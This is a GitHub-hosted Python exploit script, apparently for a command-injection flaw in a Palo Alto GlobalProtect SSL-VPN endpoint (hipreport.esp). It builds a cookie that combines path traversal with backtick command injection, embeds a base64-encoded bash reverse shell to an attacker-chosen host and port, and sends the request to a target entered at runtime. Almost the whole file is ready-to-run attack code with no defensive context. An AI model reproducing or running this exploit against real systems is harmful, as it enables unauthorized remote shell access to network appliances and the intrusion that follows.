-
Notifications
You must be signed in to change notification settings - Fork 24
/
exploit.py
29 lines (22 loc) · 1.12 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import subprocess
import base64
def generate_reverse_shell(lhost, lport):
reverse_shell_command = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
encoded_reverse_shell = base64.b64encode(reverse_shell_command.encode()).decode()
return encoded_reverse_shell
def generate_curl_command(IP, encoded_reverse_shell):
curl_command = (
f"curl -s -X POST 'https://{IP}/ssl-vpn/hipreport.esp' -k "
f"-H 'Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaa`echo${{IFS}}{encoded_reverse_shell}|base64${{IFS}}-d|bash`'"
)
return curl_command
IP = input("Enter the vulnerable target IP/Host: ")
lhost = input("Enter the IP/Host for reverse shell: ")
lport = input("Enter the port for reverse shell: ")
encoded_reverse_shell = generate_reverse_shell(lhost, lport)
curl_command = generate_curl_command(IP, encoded_reverse_shell)
try:
subprocess.run(curl_command, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print("Reverse shell successfully launched. Please wait.")
except subprocess.CalledProcessError:
print("Error occurred while launching reverse shell.")